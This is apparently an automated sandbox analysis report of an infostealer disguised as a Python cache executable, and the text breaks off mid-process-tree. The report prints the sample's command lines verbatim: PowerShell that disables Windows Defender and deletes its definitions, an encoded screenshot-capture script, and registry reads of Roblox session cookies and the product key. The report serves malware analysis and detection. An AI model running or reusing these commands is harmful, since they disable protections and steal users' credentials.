Analysis

  • max time kernel
    154s
  • max time network
    277s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
  • submitted
    03-12-2024 10:22

General

  • Target

    danger-multi-tool-main/src/utils/__pycache__/cpython-311.exe

  • Size

    7.4MB

  • MD5

    1a2ff293768d10b8c99d3cd2950164b9

  • SHA1

    e9123a3d2a53b5f8d008db9608037dd0571f3cae

  • SHA256

    3c09a37412bf3981e5d678b6598c2cdad32fcd6761fc649a50693ba45746e242

  • SHA512

    ff8a853675431bc36d88288546d7f467f239ae2e4e7ef019476ac4ca06f715e88f201753d7201dbfacb3b6dca51be764036372de8a8c0def29e00ae5e9469941

  • SSDEEP

    98304:FWeYgI6OshoKyDvuIYc5AhV+gEc4kZvRLoI0EJfNA3z5UTfHfyk6LK4dSI23o7yc:FPYmOshoKMuIkhVastRL5Di3tO/ys42O

Malware Config

Signatures

  • Deletes Windows Defender Definitions 2 TTPs 1 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • UPX packed file 58 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 40 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\danger-multi-tool-main\src\utils\__pycache__\cpython-311.exe
    "C:\Users\Admin\AppData\Local\Temp\danger-multi-tool-main\src\utils\__pycache__\cpython-311.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1804
    • C:\Users\Admin\AppData\Local\Temp\danger-multi-tool-main\src\utils\__pycache__\cpython-311.exe
      "C:\Users\Admin\AppData\Local\Temp\danger-multi-tool-main\src\utils\__pycache__\cpython-311.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1808
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\danger-multi-tool-main\src\utils\__pycache__\cpython-311.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4404
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\danger-multi-tool-main\src\utils\__pycache__\cpython-311.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2272
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1980
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4360
        • C:\Program Files\Windows Defender\MpCmdRun.exe
          "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
          4⤵
          • Deletes Windows Defender Definitions
          PID:3524
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\danger-multi-tool-main\src\utils\__pycache__\cpython-311.exe""
        3⤵
        • Hide Artifacts: Hidden Files and Directories
        • Suspicious use of WriteProcessMemory
        PID:4308
        • C:\Windows\system32\attrib.exe
          attrib +h +s "C:\Users\Admin\AppData\Local\Temp\danger-multi-tool-main\src\utils\__pycache__\cpython-311.exe"
          4⤵
          • Views/modifies file attributes
          PID:4612
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ​  .scr'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5040
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ​  .scr'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4476
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3836
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:5096
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4272
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:2480
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3116
        • C:\Windows\System32\Wbem\WMIC.exe
          WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4904
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
        3⤵
        • Clipboard Data
        • Suspicious use of WriteProcessMemory
        PID:64
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Get-Clipboard
          4⤵
          • Clipboard Data
          • Suspicious behavior: EnumeratesProcesses
          PID:1456
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1300
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          PID:4796
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2396
        • C:\Windows\system32\tree.com
          tree /A /F
          4⤵
            PID:3496
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
          3⤵
          • System Network Configuration Discovery: Wi-Fi Discovery
          • Suspicious use of WriteProcessMemory
          PID:420
          • C:\Windows\system32\netsh.exe
            netsh wlan show profile
            4⤵
            • Event Triggered Execution: Netsh Helper DLL
            • System Network Configuration Discovery: Wi-Fi Discovery
            PID:236
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "systeminfo"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2108
          • C:\Windows\system32\systeminfo.exe
            systeminfo
            4⤵
            • Gathers system information
            PID:828
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1556
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4640
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\doutjjk2\doutjjk2.cmdline"
              5⤵
                PID:4716
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7D3E.tmp" "c:\Users\Admin\AppData\Local\Temp\doutjjk2\CSCA16D5DEF29746998929CECDA4EB6852.TMP"
                  6⤵
                    PID:3720
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "tree /A /F"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:232
              • C:\Windows\system32\tree.com
                tree /A /F
                4⤵
                  PID:2828
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tree /A /F"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3560
                • C:\Windows\system32\tree.com
                  tree /A /F
                  4⤵
                    PID:1136
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                    PID:3596
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:4244
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      3⤵
                        PID:3224
                        • C:\Windows\system32\tree.com
                          tree /A /F
                          4⤵
                            PID:4132
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                          3⤵
                            PID:5056
                            • C:\Windows\system32\tree.com
                              tree /A /F
                              4⤵
                                PID:2396
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                              3⤵
                                PID:1580
                                • C:\Windows\System32\Conhost.exe
                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  4⤵
                                    PID:236
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                    4⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:1756
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                  3⤵
                                    PID:944
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                      4⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:1136
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "getmac"
                                    3⤵
                                      PID:3724
                                      • C:\Windows\system32\getmac.exe
                                        getmac
                                        4⤵
                                          PID:4324
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI18042\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\aCSaF.zip" *"
                                        3⤵
                                          PID:3976
                                          • C:\Users\Admin\AppData\Local\Temp\_MEI18042\rar.exe
                                            C:\Users\Admin\AppData\Local\Temp\_MEI18042\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\aCSaF.zip" *
                                            4⤵
                                            • Executes dropped EXE
                                            PID:4092
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                          3⤵
                                            PID:1548
                                            • C:\Windows\System32\Wbem\WMIC.exe
                                              wmic os get Caption
                                              4⤵
                                              • Suspicious behavior: EnumeratesProcesses
                                              PID:2016
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                            3⤵
                                              PID:3828
                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                wmic computersystem get totalphysicalmemory
                                                4⤵
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:5012
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                              3⤵
                                                PID:4476
                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                  wmic csproduct get uuid
                                                  4⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  PID:4620
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                3⤵
                                                  PID:752
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                    4⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:5080
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                  3⤵
                                                    PID:4372
                                                    • C:\Windows\System32\Conhost.exe
                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      4⤵
                                                        PID:3524
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic path win32_VideoController get name
                                                        4⤵
                                                        • Detects videocard installed
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:3076
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                      3⤵
                                                        PID:4708
                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                          4⤵
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          PID:4444
                                                      • C:\Windows\system32\cmd.exe
